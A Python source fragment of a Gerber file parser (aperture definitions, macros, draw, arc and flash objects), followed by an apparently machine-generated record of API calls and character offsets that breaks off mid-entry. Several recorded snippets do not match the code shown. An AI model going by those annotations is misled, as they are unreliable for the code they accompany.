    current point (modal coordinates).

    Raises:
        ValueError: If both tokens are missing.
    """
    if not x and not y:
        raise ValueError('Invalid x and y')
    new_x = int(x[1:]) if x else self.current_point[0]
    new_y = int(y[1:]) if y else self.current_point[1]
    return (new_x, new_y)
def interpolate_operation(self, statement: str):
    """Handle a D01 operation: draw a linear or circular segment.

    Creates a Draw (linear) or Arc (circular) object from the current
    point to the parsed point, then advances the current point.

    Raises:
        ValueError: If the statement is malformed, a circular segment is
            missing its I/J offset, or the interpolation state is invalid.
    """
    # D01 linear/circular line segment
    match = re.search(rf'(X{RE_INT})?(Y{RE_INT})?(I{RE_INT})?(J{RE_INT})?D01\*', statement)
    if match is not None:
        x = match.group(1)
        y = match.group(2)
        i = match.group(3)
        j = match.group(4)
        new_point = self.get_new_point(x, y)
        if self.interpolation == 'linear':
            self.add_object(Draw(self.create_aperture(), self.transform,
                                 self.current_point, new_point))
        elif self.interpolation in ('cw_circular', 'ccw_circular'):
            # Arcs require the I/J offset of the center from the start point.
            if i and j:
                offset = (int(i[1:]), int(j[1:]))
            else:
                raise ValueError(f'Missing offset: I {i}, J {j}')
            is_cw = (self.interpolation == 'cw_circular')
            self.add_object(Arc(self.create_aperture(), self.transform,
                                self.current_point, new_point,
                                offset, is_cw))
        else:
            raise ValueError(f'Invalid interpolation: {self.interpolation}')
        # Drawing is modal: the segment end becomes the new current point.
        self.current_point = new_point
    else:
        raise ValueError(f'Unrecognized interpolate operation: {statement}')
def move_operation(self, statement: str):
    """Handle a D02 operation: move the current point without drawing.

    Raises:
        ValueError: If the statement cannot be parsed.
    """
    # D02 move operation
    match = re.search(rf'(X{RE_INT})?(Y{RE_INT})?D02\*', statement)
    if match is None:
        raise ValueError(f'Unrecognized move operation: {statement}')
    self.current_point = self.get_new_point(match.group(1), match.group(2))
def flash_operation(self, statement: str):
    """Handle a D03 operation: flash the current aperture at a point.

    Raises:
        ValueError: If the statement cannot be parsed.
    """
    # D03 create flash object
    match = re.search(rf'(X{RE_INT})?(Y{RE_INT})?D03\*', statement)
    if match is not None:
        x = match.group(1)
        y = match.group(2)
        new_point = self.get_new_point(x, y)
        aperture = self.create_aperture()
        self.add_object(Flash(aperture, self.transform, new_point))
        # A flash also updates the current point.
        self.current_point = new_point
    else:
        raise ValueError(f'Unrecognized flash operation: {statement}')
def load_polarity(self, statement: str):
    """Set the transform polarity: %LPC*% is clear, %LPD*% is dark.

    Raises:
        ValueError: If the statement is not one of the two forms.
    """
    polarities = {'%LPC*%': 'clear', '%LPD*%': 'dark'}
    if statement not in polarities:
        raise ValueError(f'Unrecognized polarity statement: {statement}')
    self.transform.polarity = polarities[statement]
def load_mirroring(self, statement: str):
    """Set the transform mirroring axis: N (none), X, Y or XY.

    Raises:
        ValueError: If the statement cannot be parsed.
    """
    match = re.search(r'%LM(N|X|Y|XY)\*%', statement)
    if match is None:
        raise ValueError(f'Unrecognized mirroring statement: {statement}')
    self.transform.mirroring = match.group(1)
def load_rotation(self, statement: str):
    """Set the transform rotation in degrees counterclockwise.

    Raises:
        ValueError: If the statement cannot be parsed.
    """
    match = re.search(r'%LR(\S+)\*%', statement)
    if match is None:
        raise ValueError(f'Unrecognized rotation statement: {statement}')
    self.transform.rotation = float(match.group(1))
def load_scaling(self, statement: str):
    """Set the transform scale factor (1.0 means no scaling).

    Raises:
        ValueError: If the statement cannot be parsed.
    """
    match = re.search(r'%LS(\S+)\*%', statement)
    if match is None:
        raise ValueError(f'Unrecognized scaling statement: {statement}')
    self.transform.scaling = float(match.group(1))
def aperture_define(self, statement: str):
    """Handle an %AD statement: define a new aperture from a template.

    Parses e.g. %ADD100C,1.5*% into ident 'D100', template name 'C' and
    parameter string '1.5', then derives a concrete aperture from the
    named template.

    Raises:
        ValueError: If the statement is malformed or the ident is already
            defined.
        KeyError: If the referenced template does not exist.
    """
    # Parse e.g. %ADD100C,1.5*%
    # AD, D100, C, 1.5
    # cmd, ident, template
    match = re.search(r'%AD(D[0-9]{2,})([\w\.\$]+)(,\S*)?\*%', statement)
    if match is not None:
        ident = match.group(1)
        template_name = match.group(2)
        parameters = match.group(3)
        if parameters:
            # Drop the leading comma captured by the regex group.
            parameters = parameters.lstrip(',')
        if ident in self.apertures:
            raise ValueError(f'Aperture {ident} already defined')
        if template_name in self.templates:
            self.apertures[ident] = self.templates[template_name].derive_from(parameters)
        else:
            raise KeyError(f'Aperture template {template_name} not defined')
    else:
        raise ValueError(f'Unrecognized aperture define statement: {statement}')
def aperture_macro(self, statement: str):
    """Handle an %AM statement: register a new aperture macro template.

    Example statement: %AMCIRC*\\n1,1,1.5,0,0,0*%

    Raises:
        ValueError: If the statement is malformed or the template name is
            already registered.
    """
    # %AMCIRC*\n1,1,1.5,0,0,0*%
    match = re.search(r'%AM([\w\.\$]+)', statement)
    if match is not None:
        ident = match.group(1)
        if ident in self.templates:
            raise ValueError(f'Aperture {ident} template already defined')
        self.templates[ident] = Macro.parse(statement)
    else:
        raise ValueError(f'Unrecognized aperture macro statement: {statement}')
def aperture_block(self, statement: str):
    """Handle an %AB statement: open or close a block aperture.

    %ABD12*% opens block aperture D12 — subsequent objects are collected
    into it via the objects-list stack; %AB*% (no ident) closes the
    currently open block.

    Raises:
        ValueError: If the statement is malformed or the ident is already
            defined.
    """
    # %ABD12*%
    # %ADD11C,0.5*%
    # D10*
    # G01*
    # X-2500000Y-1000000D03*
    # Y1000000D03*
    # %LPC*%
    # ...
    # G01*
    # %AB*%
    match = re.search(r'%AB(D[0-9]{2,})?\*%', statement)
    if match is not None:
        ident = match.group(1)
        if ident is None:  # Close Block
            self.objects_list_stack.pop()
        else:  # Open new Block
            if ident in self.apertures:
                raise ValueError(f'Aperture {ident} already defined')
            self.apertures[ident] = BlockAperture()
            # New objects are appended into the block until it is closed.
            self.objects_list_stack.append(self.apertures[ident])
    else:
        raise ValueError(f'Unrecognized aperture block statement: {statement}')
def set_current_aperture(self, statement: str):
    """Select the current aperture from a Dnn statement (e.g. 'D10*').

    Raises:
        ValueError: If the statement cannot be parsed.
        KeyError: If the referenced aperture was never defined.
    """
    match = re.search(r'(D[0-9]{2,})\*', statement)
    if match is None:
        raise ValueError(f'Unrecognized set current aperture statement: {statement}')
    ident = match.group(1)
    if ident not in self.apertures:
        raise KeyError(f'Aperture {ident} is not defined')
    self.current_aperture = ident
def step_and_repeat(self, statement: str):
    """Handle an %SR statement: open or close a step-and-repeat block.

    %SRX3Y2I5.0J4.0*% opens a block repeated 3x2 times with steps of
    5.0 and 4.0; enclosed objects are collected via the objects-list
    stack. %SR*% closes the current block.

    Raises:
        ValueError: If the open statement cannot be parsed.
    """
    # %SRX3Y2I5.0J4.0*%
    # ...
    # %SR*%
    # Step and repeat all enclosed statements
    if statement == '%SR*%':
        self.objects_list_stack.pop()
    else:
        match = re.search(rf'%SRX(\d+)Y(\d+)I({RE_DEC})J({RE_DEC})\*%', statement)
        if match is not None:
            x = int(match.group(1))
            y = int(match.group(2))
            i = float(match.group(3))
            j = float(match.group(4))
            sr = StepAndRepeat(x, y, i, j)
            # The block itself is an object of the enclosing scope, and
            # also becomes the collection target for enclosed objects.
            self.add_object(sr)
            self.objects_list_stack.append(sr)
        else:
            raise ValueError(f'Unrecognized step and repeat statement: {statement}')
class ApertureTransform():
    """Graphics state applied when an aperture is used.

    Tracks polarity ('dark'/'clear'), mirroring axis ('N', 'X', 'Y',
    'XY'), rotation (degrees counterclockwise) and scaling (1.0 means
    unscaled).
    """

    def __init__(self,
                 polarity: str = 'dark', mirroring: str = 'N',
                 rotation: float = 0.0, scaling: float = 1.0):
        self.scaling = scaling
        self.rotation = rotation
        self.mirroring = mirroring
        self.polarity = polarity
class Aperture():
    """Base class for aperture shapes.

    Subclasses provide a geometric outline via get_outline() and may
    carry an optional round hole (hole_diameter attribute).
    """

    def __init__(self):
        pass

    def derive_from(self, statement: str):
        """Create a new aperture of this type from an 'X'-separated parameter list."""
        if statement is None:
            raise ValueError('Missing parameters statement')
        params = [float(token) for token in statement.split('X')]
        return type(self)(*params)

    def clone(self):
        """Return a shallow copy of this aperture."""
        return copy.copy(self)

    def get_hole_vertices(self, dest: list = None):
        """Return the hole contour (reversed winding), or None if no hole.

        When *dest* is given and a hole exists, the contour is also
        appended to it.
        """
        if not self.hole_diameter:
            return None
        hole_pts = np.flip(vertices.circle(self.hole_diameter), 0)
        if dest is not None:
            dest.append(hole_pts)
        return hole_pts

    def get_outline(self, dest: list = None):
        raise NotImplementedError('get_outline not implemented')
class Circle(Aperture):
    """Standard circular aperture with an optional round hole."""

    def __init__(self, diameter: float, hole_diameter: float = None):
        super().__init__()
        self.diameter = diameter
        self.hole_diameter = hole_diameter

    def get_outline(self, dest: list = None):
        """Build the circle outline, appending it to *dest* when given."""
        holes = []
        self.get_hole_vertices(holes)
        shape = vertices.circle(self.diameter)
        outline = vertices.OutlineVertices(shape, holes)
        if dest is not None:
            dest.append(outline)
        return outline
class Rectangle(Aperture):
    """Standard rectangular aperture with an optional round hole."""

    def __init__(self, x_size: float, y_size: float,
                 hole_diameter: float = None):
        super().__init__()
        self.x_size = x_size
        self.y_size = y_size
        self.hole_diameter = hole_diameter

    def get_outline(self, dest: list = None):
        """Build the rectangle outline, appending it to *dest* when given."""
        holes = []
        self.get_hole_vertices(holes)
        shape = vertices.rectangle(self.x_size, self.y_size)
        outline = vertices.OutlineVertices(shape, holes)
        if dest is not None:
            dest.append(outline)
        return outline
class Obround(Aperture):
    """Obround (stadium-shaped) aperture: a rectangle with semicircular ends."""

    def __init__(self, x_size: float, y_size: float,
                 hole_diameter: float = None):
        super().__init__()
        self.x_size = x_size
        self.y_size = y_size
        self.hole_diameter = hole_diameter

    def get_outline(self, dest: list = None):
        """Build the outline as a thick rounded line along the longer axis."""
        width = min(self.x_size, self.y_size)
        # Half the distance between the two semicircle centers.
        half_span = 0.5 * (max(self.x_size, self.y_size) - width)
        if self.x_size > self.y_size:
            start, end = (-half_span, 0), (half_span, 0)
        else:
            start, end = (0, -half_span), (0, half_span)
        pts = vertices.rounded_line(width, start[0], start[1], end[0], end[1])
        holes = []
        self.get_hole_vertices(holes)
        outline = vertices.OutlineVertices(pts, holes)
        if dest is not None:
            dest.append(outline)
        return outline
class Polygon(Aperture):
    """Standard regular-polygon aperture with 3 to 12 vertices."""

    def __init__(self, outer_diameter: float, vertices: int,
                 rotation: float = 0.0, hole_diameter: float = None):
        super().__init__()
        self.outer_diameter = outer_diameter
        self.vertices = int(vertices)
        self.rotation = rotation
        self.hole_diameter = hole_diameter
        if not 3 <= self.vertices <= 12:
            raise ValueError('Polygon vertices must be from 3 to 12')

    def get_outline(self, dest: list = None):
        """Build the rotated polygon outline, appending to *dest* when given."""
        pts = vertices.regular_poly(self.outer_diameter, self.vertices)
        vertices.rotate(pts, self.rotation)
        holes = []
        self.get_hole_vertices(holes)
        outline = vertices.OutlineVertices(pts, holes)
        if dest is not None:
            dest.append(outline)
        return outline
class Macro(Aperture):
    """Aperture macro template (%AM) and its instantiated primitives."""

    def __init__(self, template_str: str, primitives: list):
        super().__init__()
        self.template_str = template_str
        self.primitives = primitives

    def get_outline(self, dest: list = None):
        """Collect the outlines of all primitives in this macro."""
        outlines = []
        for prim in self.primitives:
            outlines.append(prim.get_outline(dest))
        return outlines

    def derive_from(self, statement: str):
        """Instantiate the macro with the parameters of an %AD statement.

        Positional parameters are numbered $1, $2, ... in the order they
        appear in the 'X'-separated parameter list. Macro blocks may also
        assign variables ($n = expression).

        Bug fixes: (1) assigned variables were stored under *str* keys
        while positional parameters use *int* keys, so reassigning an
        existing parameter never affected later substitution — keys are
        now normalized to int; (2) substitution now replaces higher
        numbers first so that replacing '$1' cannot corrupt '$12'.

        Raises:
            KeyError: On an unresolved $n parameter or unknown shape code.
        """

        def _substitute(text: str) -> str:
            # Replace $n tokens with their values, longest number first so
            # '$1' does not clobber the prefix of '$12'.
            for p in sorted(params, reverse=True):
                text = text.replace(f'${p}', str(params[p]))
            return text

        # Collect parameter values from creation statement
        params = {}
        if statement is not None:
            for i, token in enumerate(statement.split('X')):
                params[i + 1] = float(token)
        # Create primitives by parsing template string
        primitives = []
        blocks = self.template_str.replace('\n', '').split('*')
        for block in blocks:
            # Ignore open/close block or comment
            if block.startswith('%') or block.startswith('0'):
                continue
            # Resolve new variables
            if block.startswith('$'):
                expr = re.search(r'\$(\d+)\s*=([^*]+)*', block)
                expr_p = expr.group(1)
                expr_e = _substitute(expr.group(2))
                # Normalize to int so it matches positional parameter keys.
                params[int(expr_p)] = Macro.eval_expression(expr_e)
            # Attempt to create a primitive
            else:
                code = block.split(',')[0]
                block = _substitute(block)
                missing = re.search(r'\$\d+', block)
                if missing:
                    raise KeyError('Unfulfilled macro parameter ' +
                                   missing.group())
                try:
                    primitives.append(Macro.primtypes(code).parse(block))
                except KeyError:
                    raise KeyError('Unrecognized macro code ' + str(code))
        return type(self)(self.template_str, primitives)

    @staticmethod
    def primtypes(code):
        """Map a macro primitive shape code to its implementing class."""
        prims = {
            '1': MacroCircle,
            '20': MacroVectorLine,
            '21': MacroCenterLine,
            '4': MacroOutline,
            '5': MacroPolygon,
            '6': MacroMoire,
            '7': MacroThermal
        }
        return prims[code]

    @classmethod
    def parse(cls, statement: str):
        """Create a Macro from an %AM statement; primitives are built in derive_from."""
        if not statement.startswith('%AM'):
            raise ValueError('Invalid define macro statement')
        # TODO validate template
        return cls(statement, [])

    @staticmethod
    def eval_expression(expr: str):
        """Evaluate an arithmetic macro expression ('x' means multiplication).

        Only digits, parentheses, '.', and + - / x are allowed, which
        restricts the eval() below to plain arithmetic.
        """
        legal = set('0123456789()-+/x.')
        chars = set(expr)
        illegal = chars.difference(legal)
        if len(illegal) > 0:
            raise ValueError('Illegal characters in expression: ' + expr)
        expr = expr.replace('x', '*')  # Multiplication
        return eval(expr)
class MacroPrimitive():
    """Base class for the geometric primitives used inside aperture macros."""

    def __init__(self, exposure, x, y, rotation):
        if exposure not in (EXPOSURE_OFF, EXPOSURE_ON):
            raise ValueError('Invalid exposure value')
        self.exposure = exposure
        self.x = x
        self.y = y
        self.rotation = rotation

    def get_outline(self, dest: list = None):
        raise NotImplementedError('get_vertices not implemented')

    @classmethod
    def parse(cls, statement: str):
        """Build a primitive from a comma-separated macro block.

        The first token (the shape code) is discarded; the remaining
        tokens are evaluated as arithmetic expressions and passed to the
        constructor positionally.
        """
        if statement is None:
            raise ValueError('Missing parameters statement')
        values = statement.split(',')[1:]  # Discard first token (shape code)
        return cls(*(Macro.eval_expression(v) for v in values))
class MacroCircle(MacroPrimitive):
    """Macro primitive 1: a filled circle."""

    def __init__(self, exposure, diameter, x, y, rotation=0.0):
        super().__init__(exposure, x, y, rotation)
        self.diameter = diameter

    def get_outline(self, dest: list = None):
        """Build the transformed circle outline, appending to *dest* when given."""
        outline = vertices.OutlineVertices(vertices.circle(self.diameter))
        outline.positive = self.exposure == 1
        outline.translate(self.x, self.y)
        outline.rotate(self.rotation)
        if dest is not None:
            dest.append(outline)
        return outline
class MacroVectorLine(MacroPrimitive):
    """Macro primitive 20: a thick line given by its two end points."""

    def __init__(self, exposure, width, x1, y1, x2, y2, rotation=0.0):
        super().__init__(exposure, 0, 0, rotation)
        self.width = width
        self.x1 = x1
        self.y1 = y1
        self.x2 = x2
        self.y2 = y2

    def get_outline(self, dest: list = None):
        """Build the transformed thick-line outline, appending to *dest* when given."""
        shape = vertices.thick_line(self.width,
                                    self.x1, self.y1,
                                    self.x2, self.y2)
        outline = vertices.OutlineVertices(shape)
        outline.positive = self.exposure == 1
        outline.translate(self.x, self.y)
        outline.rotate(self.rotation)
        if dest is not None:
            dest.append(outline)
        return outline
class MacroCenterLine(MacroPrimitive):
    """Macro primitive 21: a rectangle given by its center, width and height."""

    def __init__(self, exposure, width, height, x, y, rotation=0.0):
        super().__init__(exposure, x, y, rotation)
        self.width = width
        self.height = height

    def get_outline(self, dest: list = None):
        """Build the transformed rectangle outline, appending to *dest* when given."""
        shape = vertices.rectangle(self.width, self.height)
        outline = vertices.OutlineVertices(shape)
        outline.positive = self.exposure == 1
        outline.translate(self.x, self.y)
        outline.rotate(self.rotation)
        if dest is not None:
            dest.append(outline)
        return outline
class MacroPolygon(MacroPrimitive):
    """Macro primitive 5: a regular polygon."""

    def __init__(self, exposure, vertices, x, y, diameter, rotation=0.0):
        super().__init__(exposure, x, y, rotation)
        self.vertices = vertices
        self.diameter = diameter

    def get_outline(self, dest: list = None):
        """Build the transformed polygon outline, appending to *dest* when given."""
        shape = vertices.regular_poly(self.diameter, self.vertices)
        outline = vertices.OutlineVertices(shape)
        outline.positive = self.exposure == 1
        outline.translate(self.x, self.y)
        outline.rotate(self.rotation)
        if dest is not None:
            dest.append(outline)
        return outline
class MacroThermal(MacroPrimitive):
    """Macro primitive 7: a thermal relief pad (always exposure on)."""

    def __init__(self, x, y, outer_diameter, inner_diameter,
                 gap, rotation=0.0):
        super().__init__(EXPOSURE_ON, x, y, rotation)
        self.outer_diameter = outer_diameter
        self.inner_diameter = inner_diameter
        self.gap = gap

    def get_outline(self, dest: list = None):
        """Build an annular outline; the crosshair gaps are not yet rendered."""
        pts = vertices.circle(self.outer_diameter)
        # Hole winding is reversed relative to the outer contour.
        holes = [np.flip(vertices.circle(self.inner_diameter), 0)]
        # TODO add gaps
        outline = vertices.OutlineVertices(pts, holes)
        outline.positive = self.exposure == 1
        outline.translate(self.x, self.y)
        outline.rotate(self.rotation)
        if dest is not None:
            dest.append(outline)
        return outline
class MacroMoire(MacroPrimitive):
    """Macro primitive 6: a moire target (concentric rings plus crosshair).

    Always drawn with exposure on.
    """

    def __init__(self, x, y, outer_diameter, ring_thickness,
                 gap, num_rings, crosshair_thickness, crosshair_length,
                 rotation=0.0):
        super().__init__(EXPOSURE_ON, x, y, rotation)
        self.outer_diameter = outer_diameter
        self.ring_thickness = ring_thickness
        self.gap = gap
        self.num_rings = num_rings
        self.crosshair_thickness = crosshair_thickness
        self.crosshair_length = crosshair_length

    def get_outline(self, dest: list = None):
        """Build the outline of the outermost ring only.

        Bug fix: the previous implementation read ``self.inner_diameter``,
        an attribute this class never defines, so it always raised
        AttributeError. The inner edge of the outermost ring is the outer
        diameter minus twice the ring thickness.
        """
        pts = vertices.circle(self.outer_diameter)
        # Inner edge of the outermost ring; clamp at zero for thick rings.
        inner_diameter = max(self.outer_diameter - 2 * self.ring_thickness, 0.0)
        holes = [np.flip(vertices.circle(inner_diameter), 0)]
        # TODO implement properly: remaining rings, gap and crosshair are
        # not rendered yet.
        outline = vertices.OutlineVertices(pts, holes)
        outline.positive = self.exposure == 1
        outline.translate(self.x, self.y)
        outline.rotate(self.rotation)
        if dest is not None:
            dest.append(outline)
        return outline
class MacroOutline(MacroPrimitive):
    """Macro primitive 4: a closed polygon outline.

    The trailing varargs carry 2*vertices coordinate values followed by
    the rotation angle.
    """

    def __init__(self, exposure, vertices, x, y, *args):
        N = 2 * vertices + 1  # coordinate values plus trailing rotation
        if len(args) != N:
            raise ValueError(f'Expected {N} parameters but received {len(args)}')
        super().__init__(exposure, x, y, rotation=float(args[-1]))
        self.vertices = vertices
        self.coordinates = list(args[:-1])

    def get_outline(self, dest: list = None):
        """Build the rotated polygon outline, appending to *dest* when given."""
        n_points = int(len(self.coordinates) / 2)
        pts = np.array(self.coordinates)
        pts.resize((n_points, 2))
        outline = vertices.OutlineVertices(pts)
        outline.positive = self.exposure == 1
        outline.rotate(self.rotation)
        if dest is not None:
            dest.append(outline)
        return outline
class BlockAperture(Aperture):
    """Aperture that aggregates the graphical objects of an %AB block."""

    def __init__(self):
        super().__init__()
        # Graphical objects collected while the block is open.
        self.objects = []

    def append(self, object):
        """Add a graphical object to this block."""
        self.objects.append(object)
class GraphicalObject():
    """Base class for drawable objects: an aperture, a transform and an origin.

    The transform is shallow-copied so later state changes in the parser
    do not retroactively alter already-created objects.
    """

    def __init__(self, aperture, transform, origin: tuple):
        self.aperture = aperture
        self.transform = copy.copy(transform)
        self.origin = origin

    def translate(self, translation):
        """Shift the origin by (dx, dy)."""
        dx, dy = translation
        self.origin = (self.origin[0] + dx, self.origin[1] + dy)

    def get_outline(self, dest: list = None, scale: float = 1e-6):
        raise NotImplementedError('get_outline not implemented')
class Draw(GraphicalObject):
    """A straight line segment stroked with a (circular) aperture."""

    def __init__(self, aperture, transform, origin: tuple, endpoint: tuple):
        super().__init__(aperture, transform, origin)
        self.endpoint = endpoint

    def translate(self, translation):
        """Shift both end points by (dx, dy)."""
        dx, dy = translation
        self.origin = (self.origin[0] + dx, self.origin[1] + dy)
        self.endpoint = (self.endpoint[0] + dx, self.endpoint[1] + dy)

    def get_outline(self, dest: list = None, scale: float = 1e-6):
        """Build the stroked-segment outline in scaled units."""
        start = scale * np.array(self.origin)
        end = scale * np.array(self.endpoint)
        pts = vertices.rounded_line(self.aperture.diameter,
                                    start[0], start[1], end[0], end[1])
        outline = vertices.OutlineVertices(pts)
        # TODO apply transform
        if dest is not None:
            dest.append(outline)
        return outline
# TODO Arc needs quadrant mode
class Arc(GraphicalObject):
    """A circular arc segment stroked with a (circular) aperture."""

    def __init__(self, aperture, transform, origin: tuple, endpoint: tuple,
                 offset: tuple, is_cw: bool = True):
        super().__init__(aperture, transform, origin)
        self.endpoint = endpoint
        self.offset = offset
        self.is_cw = is_cw

    def translate(self, translation):
        """Shift both end points by (dx, dy)."""
        dx, dy = translation
        self.origin = (self.origin[0] + dx, self.origin[1] + dy)
        self.endpoint = (self.endpoint[0] + dx, self.endpoint[1] + dy)

    def get_outline(self, dest: list = None, scale: float = 1e-6):
        """Build the stroked-arc outline in scaled units."""
        dx, dy = scale * np.array(self.offset)
        x1, y1 = scale * np.array(self.origin)
        x2, y2 = scale * np.array(self.endpoint)
        # The arc center is the start point plus the I/J offset.
        x0, y0 = x1 + dx, y1 + dy
        pts = vertices.rounded_arc(self.aperture.diameter, x0, y0, x1, y1, x2, y2)
        vertices.translate(pts, x0, y0)
        outline = vertices.OutlineVertices(pts)
        # TODO apply transform
        if dest is not None:
            dest.append(outline)
        return outline
class Flash(GraphicalObject):
    """A single replication of an aperture at a point."""

    def __init__(self, aperture, transform, origin: tuple):
        super().__init__(aperture, transform, origin)

    def get_outline(self, dest: list = None, scale: float = 1e-6):
        """Build the aperture outline(s) positioned at the flash location."""
        outlines = self.aperture.get_outline(dest)
        # Macro apertures return a list; normalize single outlines.
        if type(outlines) != list:
            outlines = [outlines]
        x0, y0 = scale * np.array(self.origin)
        # TODO replace with apply transform function
        for outline in outlines:
            outline.positive = self.transform.polarity == 'dark'
            outline.rotate(self.transform.rotation)
            outline.translate(x0, y0)
        return outlines
class Region(GraphicalObject):
    """A region built from one or more contours of connected segments.

    Contours are recorded as (start_index, length) spans over the
    objects list; a new contour starts whenever an appended segment does
    not begin where the previous one ended.
    """

    def __init__(self, transform):
        super().__init__(None, transform, None)
        self.objects = []
        self.contours = []

    def end_contour(self):
        """Close the current contour, recording its (start, length) span."""
        if self.contours:
            prev_start, prev_len = self.contours[-1]
            start = prev_start + prev_len
        else:
            start = 0
        self.contours.append((start, len(self.objects) - start))

    def append(self, object):
        """Append a segment, starting a new contour on a discontinuity."""
        if not isinstance(object, (Draw, Arc)):
            raise TypeError('Region only supports Draw and Arc objects')
        if self.objects and object.origin != self.objects[-1].endpoint:
            self.end_contour()
        self.objects.append(object)
class StepAndRepeat():
    """Container repeating its objects in an nx-by-ny grid with given steps."""

    def __init__(self, nx: int, ny: int, step_x: float, step_y: float):
        if min(nx, ny) < 1:
            raise ValueError('Repeat must be 1 or greater')
        if min(step_x, step_y) < 0.0:
            raise ValueError('Step size must be positive')
        self.nx = nx
        self.ny = ny
        self.step_x = step_x
        self.step_y = step_y
        self.objects = []

    def append(self, object):
        """Add a graphical object to be repeated."""
        self.objects.append(object)
| [
"vertices.rotate",
"numpy.flip",
"vertices.rounded_arc",
"vertices.thick_line",
"vertices.translate",
"vertices.regular_poly",
"vertices.rounded_line",
"vertices.OutlineVertices",
"vertices.circle",
"numpy.array",
"vertices.rectangle",
"copy.copy",
"re.search"
] | [((5454, 5517), 're.search', 're.search', (['"""%FSLAX([1-6])([3-6])Y([1-6])([3-6])\\\\*%"""', 'statement'], {}), "('%FSLAX([1-6])([3-6])Y([1-6])([3-6])\\\\*%', statement)\n", (5463, 5517), False, 'import re\n'), ((7133, 7212), 're.search', 're.search', (['f"""(X{RE_INT})?(Y{RE_INT})?(I{RE_INT})?(J{RE_INT})?D01\\\\*"""', 'statement'], {}), "(f'(X{RE_INT})?(Y{RE_INT})?(I{RE_INT})?(J{RE_INT})?D01\\\\*', statement)\n", (7142, 7212), False, 'import re\n'), ((8441, 8496), 're.search', 're.search', (['f"""(X{RE_INT})?(Y{RE_INT})?D02\\\\*"""', 'statement'], {}), "(f'(X{RE_INT})?(Y{RE_INT})?D02\\\\*', statement)\n", (8450, 8496), False, 'import re\n'), ((8833, 8888), 're.search', 're.search', (['f"""(X{RE_INT})?(Y{RE_INT})?D03\\\\*"""', 'statement'], {}), "(f'(X{RE_INT})?(Y{RE_INT})?D03\\\\*', statement)\n", (8842, 8888), False, 'import re\n'), ((9723, 9764), 're.search', 're.search', (['"""%LM(N|X|Y|XY)\\\\*%"""', 'statement'], {}), "('%LM(N|X|Y|XY)\\\\*%', statement)\n", (9732, 9764), False, 'import re\n'), ((10051, 10088), 're.search', 're.search', (['"""%LR(\\\\S+)\\\\*%"""', 'statement'], {}), "('%LR(\\\\S+)\\\\*%', statement)\n", (10060, 10088), False, 'import re\n'), ((10373, 10410), 're.search', 're.search', (['"""%LS(\\\\S+)\\\\*%"""', 'statement'], {}), "('%LS(\\\\S+)\\\\*%', statement)\n", (10382, 10410), False, 'import re\n'), ((10748, 10813), 're.search', 're.search', (['"""%AD(D[0-9]{2,})([\\\\w\\\\.\\\\$]+)(,\\\\S*)?\\\\*%"""', 'statement'], {}), "('%AD(D[0-9]{2,})([\\\\w\\\\.\\\\$]+)(,\\\\S*)?\\\\*%', statement)\n", (10757, 10813), False, 'import re\n'), ((11588, 11629), 're.search', 're.search', (['"""%AM([\\\\w\\\\.\\\\$]+)"""', 'statement'], {}), "('%AM([\\\\w\\\\.\\\\$]+)', statement)\n", (11597, 11629), False, 'import re\n'), ((12223, 12267), 're.search', 're.search', (['"""%AB(D[0-9]{2,})?\\\\*%"""', 'statement'], {}), "('%AB(D[0-9]{2,})?\\\\*%', statement)\n", (12232, 12267), False, 'import re\n'), ((12916, 12955), 're.search', 're.search', 
(['"""(D[0-9]{2,})\\\\*"""', 'statement'], {}), "('(D[0-9]{2,})\\\\*', statement)\n", (12925, 12955), False, 'import re\n'), ((14706, 14721), 'copy.copy', 'copy.copy', (['self'], {}), '(self)\n', (14715, 14721), False, 'import copy\n'), ((15419, 15449), 'vertices.circle', 'vertices.circle', (['self.diameter'], {}), '(self.diameter)\n', (15434, 15449), False, 'import vertices\n'), ((15525, 15561), 'vertices.OutlineVertices', 'vertices.OutlineVertices', (['pts', 'holes'], {}), '(pts, holes)\n', (15549, 15561), False, 'import vertices\n'), ((15965, 16009), 'vertices.rectangle', 'vertices.rectangle', (['self.x_size', 'self.y_size'], {}), '(self.x_size, self.y_size)\n', (15983, 16009), False, 'import vertices\n'), ((16085, 16121), 'vertices.OutlineVertices', 'vertices.OutlineVertices', (['pts', 'holes'], {}), '(pts, holes)\n', (16109, 16121), False, 'import vertices\n'), ((16777, 16817), 'vertices.rounded_line', 'vertices.rounded_line', (['w', 'x1', 'y1', 'x2', 'y2'], {}), '(w, x1, y1, x2, y2)\n', (16798, 16817), False, 'import vertices\n'), ((16893, 16929), 'vertices.OutlineVertices', 'vertices.OutlineVertices', (['pts', 'holes'], {}), '(pts, holes)\n', (16917, 16929), False, 'import vertices\n'), ((17536, 17593), 'vertices.regular_poly', 'vertices.regular_poly', (['self.outer_diameter', 'self.vertices'], {}), '(self.outer_diameter, self.vertices)\n', (17557, 17593), False, 'import vertices\n'), ((17602, 17637), 'vertices.rotate', 'vertices.rotate', (['pts', 'self.rotation'], {}), '(pts, self.rotation)\n', (17617, 17637), False, 'import vertices\n'), ((17713, 17749), 'vertices.OutlineVertices', 'vertices.OutlineVertices', (['pts', 'holes'], {}), '(pts, holes)\n', (17737, 17749), False, 'import vertices\n'), ((21675, 21705), 'vertices.circle', 'vertices.circle', (['self.diameter'], {}), '(self.diameter)\n', (21690, 21705), False, 'import vertices\n'), ((21724, 21753), 'vertices.OutlineVertices', 'vertices.OutlineVertices', (['pts'], {}), '(pts)\n', (21748, 21753), 
False, 'import vertices\n'), ((22300, 22367), 'vertices.thick_line', 'vertices.thick_line', (['self.width', 'self.x1', 'self.y1', 'self.x2', 'self.y2'], {}), '(self.width, self.x1, self.y1, self.x2, self.y2)\n', (22319, 22367), False, 'import vertices\n'), ((22454, 22483), 'vertices.OutlineVertices', 'vertices.OutlineVertices', (['pts'], {}), '(pts)\n', (22478, 22483), False, 'import vertices\n'), ((22973, 23016), 'vertices.rectangle', 'vertices.rectangle', (['self.width', 'self.height'], {}), '(self.width, self.height)\n', (22991, 23016), False, 'import vertices\n'), ((23035, 23064), 'vertices.OutlineVertices', 'vertices.OutlineVertices', (['pts'], {}), '(pts)\n', (23059, 23064), False, 'import vertices\n'), ((23566, 23617), 'vertices.regular_poly', 'vertices.regular_poly', (['self.diameter', 'self.vertices'], {}), '(self.diameter, self.vertices)\n', (23587, 23617), False, 'import vertices\n'), ((23636, 23665), 'vertices.OutlineVertices', 'vertices.OutlineVertices', (['pts'], {}), '(pts)\n', (23660, 23665), False, 'import vertices\n'), ((24241, 24277), 'vertices.circle', 'vertices.circle', (['self.outer_diameter'], {}), '(self.outer_diameter)\n', (24256, 24277), False, 'import vertices\n'), ((24297, 24333), 